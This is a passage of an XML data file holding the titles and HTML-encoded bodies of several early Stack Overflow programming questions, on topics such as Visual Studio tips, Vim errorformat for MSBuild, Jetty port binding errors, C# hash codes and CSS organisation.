    <t>Hidden Features of Visual Studio (2005-2010)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Visual Studio is such a massively big product that even after years of working with it I sometimes stumble upon a new/better way to do things or things I didn't even know were possible.&lt;/p&gt;
&lt;p&gt;For instance-&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;kbd&gt;Crtl&lt;/kbd&gt; + &lt;kbd&gt;R&lt;/kbd&gt;, &lt;kbd&gt;Ctrl&lt;/kbd&gt; + &lt;kbd&gt;W&lt;/kbd&gt; to show white spaces. Essential for editing Python build scripts.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Under &lt;code&gt;"HKEY_CURRENT_USER\Software\Microsoft\VisualStudio\8.0\Text Editor"&lt;/code&gt; 
Create a String called &lt;a href="http://stackoverflow.com/questions/84209/vertical-line-after-a-certain-amount-characters-in-visual-studio"&gt;Guides&lt;/a&gt; with the value "RGB(255,0,0), 80" to have a red line at column 80 in the text editor.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What other hidden features have you stumbled upon?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SSO in webpages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know what's the best technique to do single sign-on in web sites. It means that if you enter in more than one website, you will be authenticated in a "transparent" way. I'm using php + curl to set the cookies for the different sites, but i really would like to know if does exist a standard way to do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pause / resume any external process under Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for different ways to pause and resume programmatically a particular process via its process ID under Windows XP.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.codeproject.com/KB/threads/pausep.aspx" rel="nofollow"&gt;Process suspend/resume tool&lt;/a&gt; does it with &lt;code&gt;SuspendThread&lt;/code&gt; / &lt;code&gt;ResumeThread&lt;/code&gt; but warns about multi-threaded programs and deadlock problems.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897540.aspx" rel="nofollow"&gt;PsSuspend&lt;/a&gt; looks okay, but I wonder if it does anything special about deadlocks or uses another method?&lt;/p&gt;
&lt;p&gt;Prefered languages : C++ / Python&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you bind in xaml to a dynamic xpath?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list box that displays items based on an XPath query.&lt;/p&gt;
&lt;p&gt;This XPath query changes depending on the user's selection elsewhere in the GUI.
The XPath always refers to the same document.&lt;/p&gt;
&lt;p&gt;At the moment, I use some C# code behind to change the binding of the control to a new XPath expression.&lt;/p&gt;
&lt;p&gt;I'd like instead to bind in XAML to an XPath, then change the value of that XPath as required.&lt;/p&gt;
&lt;p&gt;How would i do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the mac address or IPAddress from a cisco callmanager?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to retrieve either the mac address or the IP address of phones on a Cisco server using Callmanager version 6 via the axl with VB.net?&lt;/p&gt;
&lt;p&gt;The server can retrieve the IP address itself to use the phone and it's not in the database information retrieved from the server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL Training videos</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi were can I find training videos for MySQL ?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I retrieve the selected rows of a woodstock table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JSF woodstock table with checkboxes. When a row is selected I want to do some processing with those items. I managed to get a selection of RowKey objects but can't find out how to get the original objects I put in back. The table is populated by an ObjectListDataProvider.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help needed for extending Asp.Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As most of you would know, if I drop a file named app_offline.htm in the root of an asp.net application, it takes the application offline &lt;a href="http://asp-net-whidbey.blogspot.com/2006/04/aspnet-20-features-appofflinehtm.html" rel="nofollow"&gt;as detailed here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You would also know, that while this is great, IIS actually returns a 404 code when this is in process and Microsoft is not going to do anything about it &lt;a href="https://connect.microsoft.com/VisualStudio/feedback/ViewFeedback.aspx?FeedbackID=319986" rel="nofollow"&gt;as mentioned here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, since Asp.Net in general is so extensible, I am thinking that shouldn't there be a way to over ride this status code to return a 503 instead? The problem is, I don't know where to start looking to make this change.&lt;/p&gt;
&lt;p&gt;HELP!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AMD 64 bit Dual Core Optimization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a graphics intensive application that seems to be experiencing problems on AMD 64 bit Dual Core platforms that are not apparent on Intel platforms.&lt;/p&gt;
&lt;p&gt;Running the application causes the CPU to run at 100%, in particular when using code for shadows and lighting (Open GL).&lt;/p&gt;
&lt;p&gt;Does anyone know of specific issues with AMD processors that could cause this or know where to track down the problem, and/or ways to optimize the code base to avoid these issues?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;note, the application generally works well on mid range hardware, my dev machine has an nvidia gtx260 card in, so lack of power should not be an issue&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>spring &amp; web service client - Fault Detail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How could I get the Fault Detail sent by a SoapFaultClientException ?
I use a WebServiceTemplate as shown below :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WebServiceTemplate ws = new WebServiceTemplate();
ws.setMarshaller(client.getMarshaller());
ws.setUnmarshaller(client.getUnMarshaller());
try {
    MyResponse resp = (MyResponse) = ws.marshalSendAndReceive(WS_URI, req);
} catch (SoapFaultClientException e) {
     SoapFault fault =  e.getSoapFault();
     SoapFaultDetail details = e.getSoapFault().getFaultDetail();
      //details always NULL ? Bug?
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Web Service Fault sent seems correct :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&amp;gt;
&amp;lt;soapenv:Body&amp;gt;
  &amp;lt;soapenv:Fault&amp;gt;
     &amp;lt;faultcode&amp;gt;soapenv:Client&amp;lt;/faultcode&amp;gt;
     &amp;lt;faultstring&amp;gt;Validation error&amp;lt;/faultstring&amp;gt;
     &amp;lt;faultactor/&amp;gt;
     &amp;lt;detail&amp;gt;
        &amp;lt;ws:ValidationError xmlns:ws="http://ws.x.y.com"&amp;gt;ERR_UNKNOWN&amp;lt;/ws:ValidationError&amp;gt;
     &amp;lt;/detail&amp;gt;
  &amp;lt;/soapenv:Fault&amp;gt;
&amp;lt;/soapenv:Body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Willome&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is an ideal variable naming convention for loop variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you are writing a &lt;em&gt;simple&lt;/em&gt; little loop, what &lt;em&gt;should&lt;/em&gt; you name the counter?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Provide example loops!&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSV API for Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a simple API that will allow me to use read a CSV input file, do some simple transformations, and then write it.&lt;/p&gt;
&lt;p&gt;A quick google has found &lt;a href="http://flatpack.sourceforge.net/"&gt;http://flatpack.sourceforge.net/&lt;/a&gt; which looks promising.&lt;/p&gt;
&lt;p&gt;I just wanted to check what others are using before I couple myself to this API.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What would you use to write end user documentation for a WPF application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're working on a WPF-based application and we would like to have user documentation included in the application.&lt;/p&gt;
&lt;p&gt;Our requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Must support multiple output formats (CHM,HTML,PDF)&lt;/li&gt;
&lt;li&gt;Be able to load the text into a WPF application&lt;/li&gt;
&lt;li&gt;Be familiar for a windows user&lt;/li&gt;
&lt;li&gt;Preferrable possible to give us context sensitive help within the application&lt;/li&gt;
&lt;li&gt;Nice predefined template so we only need to adjust to our colours&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've been considering basing this on &lt;a href="http://en.wikipedia.org/wiki/Microsoft_Assistance_Markup_Language" rel="nofollow"&gt;MAML&lt;/a&gt; which is Vista's documentation format, but I am a bit unsure about the tooling support and the &lt;a href="http://en.wikipedia.org/wiki/Online_help" rel="nofollow"&gt;lack of commitment for a public API&lt;/a&gt; by Microsoft. Does anyone have any experience with MAML?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is the best .Net XML-RPC library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to communicate with an XML-RPC server from a .NET 2.0 client. Can you recommend any libraries?&lt;/p&gt;
&lt;p&gt;EDIT: Having tried XML-RPC.Net, I like the way it generates dynamic proxies, it is very neat. Unfortunately, as always, things are not so simple. I am accessing an XML-RPC service which uses the unorthodox technique of having object names in the names of the methods, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object1.object2.someMethod(string1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This means I can't use the attributes to set the names of my methods, as they are not known until run-time. If you start trying to get closer to the raw calls, XML-RPC.Net starts to get pretty messy.&lt;/p&gt;
&lt;p&gt;So, anyone know of a simple and straightforward XML-RPC library that'll just let me do (pseudocode):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x = new xmlrpc(host, port)
x.makeCall("methodName", "arg1");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I had a look at a thing by Michael somebody on Codeproject, but there are no unit tests and the code looks pretty dire.&lt;/p&gt;
&lt;p&gt;Unless someone has a better idea looks like I am going to have to start an open source project myself!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vim errorformat for Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use Vim's quickfix features with the output from Visual Studio's devenv build process or msbuild.&lt;/p&gt;
&lt;p&gt;I've created a batch file called build.bat which executes the devenv build like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;devenv MySln.sln /Build Debug
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In vim I've pointed the :make command to that batch file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;:set makeprg=build.bat
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I now run :make, the build executes successfully, however the errors don't get parsed out.  So if I run :cl or :cn I just end up seeing all the output from devenv /Build.  I should see only the errors.&lt;/p&gt;
&lt;p&gt;I've tried a number of different errorformat settings that I've found on various sites around the net, but none of them have parsed out the errors correctly.  Here's a few I've tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set errorformat=%*\\d&amp;gt;%f(%l)\ :\ %t%[A-z]%#\ %m
set errorformat=\ %#%f(%l)\ :\ %#%t%[A-z]%#\ %m
set errorformat=%f(%l,%c):\ error\ %n:\ %f
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And of course I've tried Vim's default.&lt;/p&gt;
&lt;p&gt;Here's some example output from the build.bat:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\TFS\KwB Projects\Thingy&amp;gt;devenv Thingy.sln /Build Debug 
Microsoft (R) Visual Studio Version 9.0.30729.1.
Copyright (C) Microsoft Corp. All rights reserved.
------ Build started: Project: Thingy, Configuration: Debug Any CPU ------
c:\WINDOWS\Microsoft.NET\Framework\v3.5\Csc.exe /noconfig /nowarn:1701,1702 /errorreport:prompt /warn:4 /define:DEBUG;TRACE /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll" /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dll" /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll" /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.DataSetExtensions.dll" /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Data.dll /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.Linq.dll" /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Xml.dll /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll" /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\UIAutomationProvider.dll" /reference:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll" /debug+ /debug:full /filealign:512 /optimize- /out:obj\Debug\Thingy.exe /resource:obj\Debug\Thingy.g.resources /resource:obj\Debug\Thingy.Properties.Resources.resources /target:winexe App.xaml.cs Controller\FieldFactory.cs Controller\UserInfo.cs Data\ThingGatewaySqlDirect.cs Data\ThingListFetcher.cs Data\UserListFetcher.cs Gui\FieldList.xaml.cs Interfaces\IList.cs Interfaces\IListFetcher.cs Model\ComboBoxField.cs Model\ListValue.cs Model\ThingType.cs Interfaces\IThingGateway.cs Model\Field.cs Model\TextBoxField.cs Model\Thing.cs Gui\MainWindow.xaml.cs Gui\ThingWindow.xaml.cs Interfaces\IField.cs Properties\AssemblyInfo.cs Properties\Resources.Designer.cs Properties\Settings.Designer.cs RequiredValidation.cs "C:\TFS\KwB Projects\Thingy\Thingy\obj\Debug\Gui\FieldList.g.cs" "C:\TFS\KwB Projects\Thingy\Thingy\obj\Debug\Gui\MainWindow.g.cs" "C:\TFS\KwB Projects\Thingy\Thingy\obj\Debug\Gui\ThingWindow.g.cs" "C:\TFS\KwB Projects\Thingy\Thingy\obj\Debug\App.g.cs" "C:\TFS\KwB Projects\Thingy\Thingy\obj\Debug\GeneratedInternalTypeHelper.g.cs"
C:\TFS\KwB Projects\Thingy\Thingy\Controller\FieldFactory.cs(14,19): error CS0246: The type or namespace name 'IFieldNothing' could not be found (are you missing a using directive or an assembly reference?)
Compile complete -- 1 errors, 0 warnings
========== Build: 0 succeeded or up-to-date, 1 failed, 0 skipped ==========
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;
It looks like using msbuild instead of devenv is probably the right way to go (as per Jay's comment).&lt;/p&gt;
&lt;p&gt;Using msbuild the makeprg would be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;:set makeprg=msbuild\ /nologo\ /v:q
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sample output whould be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Controller\FieldFactory.cs(14,19): error CS0246: The type or namespace name 'IFieldNothing' could not be found (are you missing a using directive or an assembly reference?)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It looks like the tricky part here may lie in the fact that the path is relative to the .csproj file, not the .sln file which is the current directory in Vim and lies one directory above the .csproj file.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ANSWER:&lt;/strong&gt;
I figured it out...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set errorformat=\ %#%f(%l\\\,%c):\ %m
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will capture the output for both devenv /Build and msbuild.
However, msbuild has one catch.  By default, it's output doesn't include full paths.  To fix this you have to add the following line to your csproj file's main PropertyGroup:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;GenerateFullPaths&amp;gt;True&amp;lt;/GenerateFullPaths&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How many bits are there in a nibble?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;binary question :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to prevent google search terms from matching urls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At the moment, I am doing a number of searches which include "html" in them, for example "html rearrange".  Unfortunately, I get a lot of hits from sites that include "rearrange" on a .html page but have no mention of html in the page itself.&lt;/p&gt;
&lt;p&gt;Is there a way to prevent search terms from matching urls?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restrict access to a single application when logging in from the console without replacing GINA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know if there is a feasible way on Windows XP to programmatically create and configure a user account so that after logging in from the console (no terminal services) a specific app is launched and the user is "locked" to that app ?&lt;/p&gt;
&lt;p&gt;The user should be prevented from doing anything else with the system (e.g.: no ctrl+alt+canc, no ctrl+shift+esc, no win+e, no nothing).&lt;/p&gt;
&lt;p&gt;As an added optional bonus the user should be logged off when the launched app is closed and/or crashes.&lt;/p&gt;
&lt;p&gt;Any existing free tool, language or any mixture of them that gets the job done would be fine (batch, VB-script, C, C++, whatever)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prototype get by tag function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get an element or elementlist by it's tag name. Take for example that I want all elements from &lt;code&gt;&amp;lt;h1&amp;gt;&amp;lt;/h1&amp;gt;&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP: GET-data automatically being declared as variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Take this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
if (isset($_POST['action']) &amp;amp;&amp;amp; !empty($_POST['action'])) {
    $action = $_POST['action'];
}
if ($action) {
    echo $action;
}
else { 
    echo 'No variable';
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then access the file with ?action=test
Is there any way of preventing $action from automatically being declared by the GET? Other than of course adding&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;amp;&amp;amp; !isset($_GET['action'])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why would I want the variable to be declared for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do I get "java.net.BindException: Only one usage of each socket address" if netstat says something else?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
&lt;li&gt;I start up my application which uses a Jetty server, using port 9000.&lt;/li&gt;
&lt;li&gt;I then shut down my application with Ctrl-C&lt;/li&gt;
&lt;li&gt;I check with "netstat -a" and see that the port 9000 is no longer being used.&lt;/li&gt;
&lt;li&gt;I restart my application and get:&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;[ERROR,9/19 15:31:08] java.net.BindException: Only one usage of each socket address (protocol/network address/port) is normally permitted
[TRACE,9/19 15:31:08] java.net.BindException: Only one usage of each socket address (protocol/network address/port) is normally permitted
[TRACE,9/19 15:31:08]        at java.net.PlainSocketImpl.convertSocketExceptionToIOException(PlainSocketImpl.java:75)
[TRACE,9/19 15:31:08]        at sun.nio.ch.Net.bind(Net.java:101)
[TRACE,9/19 15:31:08]        at sun.nio.ch.ServerSocketChannelImpl.bind(ServerSocketChannelImpl.java:126)
[TRACE,9/19 15:31:08]        at sun.nio.ch.ServerSocketAdaptor.bind(ServerSocketAdaptor.java:77)
[TRACE,9/19 15:31:08]        at org.mortbay.jetty.nio.BlockingChannelConnector.open(BlockingChannelConnector.java:73)
[TRACE,9/19 15:31:08]        at org.mortbay.jetty.AbstractConnector.doStart(AbstractConnector.java:285)
[TRACE,9/19 15:31:08]        at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:40)
[TRACE,9/19 15:31:08]        at org.mortbay.jetty.Server.doStart(Server.java:233)
[TRACE,9/19 15:31:08]        at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:40)
[TRACE,9/19 15:31:08]        at ...
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is this a Java bug? Can I avoid it somehow before starting the Jetty server?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit #1&lt;/strong&gt; Here is our code for creating our BlockingChannelConnector, note the "setReuseAddress(true)":&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;    connector.setReuseAddress( true );
    connector.setPort( port );
    connector.setStatsOn( true );
    connector.setMaxIdleTime( 30000 );
    connector.setLowResourceMaxIdleTime( 30000 );
    connector.setAcceptQueueSize( maxRequests );
    connector.setName( "Blocking-IO Connector, bound to host " + connector.getHost() );
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;Could it have something to do with the idle time?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit #2&lt;/strong&gt; Next piece of the puzzle that may or may not help: when running the application in Debug Mode (Eclipse) the server starts up without a problem!!! But the problem described above occurs reproducibly when running the application in Run Mode or as a built jar file. Whiskey Tango Foxtrot?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit #3 (4 days later)&lt;/strong&gt; - still have the issue. Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why would VS2005 keep checking out a project for editing without any changes being made?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a VS2005 solution which contains a variety of projects (C++ DLLs, C++ static libraries, C# assemblies, C++ windows executables) that are combined in various ways to produce several executables.  For some reason, every time I open the solution, VS2005 wants to check out one of the projects for editing.  The project is not modified in any way, it's just checked out.  If I configure VS2005 to prompt before checking out, I can cancel the auto-checkout during load with no ill effect that I can see.  It may or may not be relevant, but the project it keeps checking out is cppunit version 1.12.0 (the static lib version).  How can I stop this annoying behavior?&lt;/p&gt;
&lt;p&gt;Other potentially relevant (or not) details:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Source control is Team Foundation Server (not Visual SourceSafe)&lt;/li&gt;
&lt;li&gt;no .suo or .ncb files are checked in&lt;/li&gt;
&lt;li&gt;the .vcproj and .vspscc files are being checked out&lt;/li&gt;
&lt;li&gt;When I close the solution or shut down Visual Studio, I'm asked whether I want to save changes to the project.  Answering yes results in no changes to the file (Kdiff3 compares my local file to the server version and reports"files are binary equal")&lt;/li&gt;
&lt;li&gt;Attempting to check in the "modified" files results in a Visual Studio message saying "No Changes to Check In.  All of the changes were either unmodified files or locks.  The changes have been undone by the server"&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Farseer Physics Tutorials, Help files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a tutotial or help file, suitable for a beginner c# programmer to use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Synchronize SourceSafe with SVN</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our company has a policy imposing the requirement of keeping source code in a SourceSafe repository. I've tried hard to persuade the management to migrate to SVN with no success (whcih is an another issue, anyway). &lt;/p&gt;
&lt;p&gt;As I and few of my colleagues use SVN repository placed on my computer (via Apache), I made a PowerShell script which does backups of the repository onto a company server (which is then periodically backed up as well). This works well, but say I wanted also to keep a copy of the source code on our SourceSafe server.&lt;/p&gt;
&lt;p&gt;Any experience or tips on doing that?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to create a drop-down list in a Windows application using Visual Basic?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to add a drop-down list to a Windows application.  It will have two choices, neither of which are editable.  What's the best control to use?  Is it a combo box with the editing property set to No?&lt;/p&gt;
&lt;p&gt;I'm using Visual Studio 2008.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What would you say, is the best online-source for PHP-related things?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would you say is the best online-source for interesting things about &lt;code&gt;PHP&lt;/code&gt; and stuff around it? I am thinking along the lines of a blog or online-magazine, which tells me about tricks, news and best practices.&lt;/p&gt;
&lt;p&gt;Please add a short comment about the site you recomment! :)&lt;/p&gt;
&lt;p&gt;Best regards, B&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq to SQL Association combo box order</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is kind of a weird question and more of an annoyance than technical brick wall.&lt;/p&gt;
&lt;p&gt;When I'm adding tables and such using the Linq-to-SQL designer and I want to create an association using the dialogs. I right click on one of the target tables and choose &lt;em&gt;Add&lt;/em&gt; &gt; &lt;em&gt;Association&lt;/em&gt; as normal and I am presented with the &lt;strong&gt;Association Editor&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;Parent Class:&lt;/em&gt; and &lt;em&gt;Child Class:&lt;/em&gt; combo boxes are filled with the tables that currently exist in the designer.&lt;/p&gt;
&lt;p&gt;But they are not in alphabetical order they are in the order that they were added to the designer.&lt;/p&gt;
&lt;p&gt;Can I change the order of these combo boxes? And if I can, where do I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Learning Anaysis Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good resource -- book, website, article, etc -- to help me learn SQL Server Analysis services.&lt;/p&gt;
&lt;p&gt;I have no knowledge of this technology right now but I do constantly work with SQL server in the traditional sense. &lt;/p&gt;
&lt;p&gt;I want to learn about Cubes and Using Reporting Services with it. I want to start from the bottom but after I finish with the material, ideally, I'd be able to stumble through a real development project...&lt;/p&gt;
&lt;p&gt;I'm hoping to get started with a free resource but if anyone knows of a &lt;strong&gt;really good&lt;/strong&gt; book, I'd take that too.&lt;/p&gt;
&lt;p&gt;Or, if you don't know of a resource how did you get started with the technology?&lt;/p&gt;
&lt;p&gt;Thank you,&lt;br&gt;
Frank&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS Margin Collapsing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So essentially does margin collapsing occur when you don't set any margin or padding or border to a given div element?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does c# figure out the hash code for an object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question comes out of the discussion on &lt;a href="http://stackoverflow.com/questions/101825/whats-the-best-way-of-using-a-pair-triple-etc-of-values-as-one-value-in-c"&gt;tuples&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I started thinking about the hash code that a tuple should have. 
What if we will accept KeyValuePair class as a tuple? It doesn't override the GetHashCode() method, so probably it won't be aware of the hash codes of it's "children"... So, run-time will call Object.GetHashCode(), which is not aware of the real object structure.&lt;/p&gt;
&lt;p&gt;Then we can make two instances of some reference type, which are actually Equal, because of the overloaded GetHashCode() and Equals(). And use them as "children" in tuples to "cheat" the dictionary.&lt;/p&gt;
&lt;p&gt;But it doesn't work! Run-time somehow figures out the structure of our tuple and calls the overloaded GetHashCode of our class!&lt;/p&gt;
&lt;p&gt;How does it work? What's the analysis made by Object.GetHashCode()? &lt;/p&gt;
&lt;p&gt;Can it affect the performance in some bad scenario, when we use some complicated keys? (probably, impossible scenario... but still)&lt;/p&gt;
&lt;p&gt;Consider this code as an example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace csharp_tricks
{
    class Program
    {
        class MyClass
        {
            int keyValue;
            int someInfo;
            public MyClass(int key, int info)
            {
                keyValue = key;
                someInfo = info;
            }
            public override bool Equals(object obj)
            {
                MyClass other = obj as MyClass;
                if (other == null) return false;
                return keyValue.Equals(other.keyValue);
            }
            public override int GetHashCode()
            {
                return keyValue.GetHashCode();
            }
        }
        static void Main(string[] args)
        {
            Dictionary&amp;lt;object, object&amp;gt; dict = new Dictionary&amp;lt;object, object&amp;gt;();
            dict.Add(new KeyValuePair&amp;lt;MyClass,object&amp;gt;(new MyClass(1, 1), 1), 1);
            //here we get the exception -- an item with the same key was already added
            //but how did it figure out the hash code?
            dict.Add(new KeyValuePair&amp;lt;MyClass,object&amp;gt;(new MyClass(1, 2), 1), 1); 
            return;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; I think I've found an explanation for this as stated below in my answer. The main outcomes of it are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Be careful with your keys and their hash codes :-)&lt;/li&gt;
&lt;li&gt;For complicated dictionary keys you must override Equals() and GetHashCode() correctly.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>css organization and colours</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just finished a medium sized web site and one thing I noticed about my css organization was that I have a lot of hard coded colour values throughout.  This obviously isn't great for maintainability.  Generally, when I design a site I pick 3-5 main colours for a theme.  I end up setting some default values for paragraphs, links, etc... at the beginning of my main css, but some components will change the colour (like the legend tag for example) and require me to restyle with the colour I wanted.  How do you avoid this?  I was thinking of creating separate rules for each colour and just use those when I need to restyle.&lt;/p&gt;
&lt;p&gt;i.e.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.color1 {
    color: #3d444d;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I install CPAN modules locally without root access (DynaLoader.pm line 229 error)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Doesn't work with other modules, but to give an example. I installed Text::CSV_XS with a CPAN setting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'makepl_arg' =&amp;gt; q[PREFIX=~/lib],
&lt;/code&gt;&lt;/pre&gt;
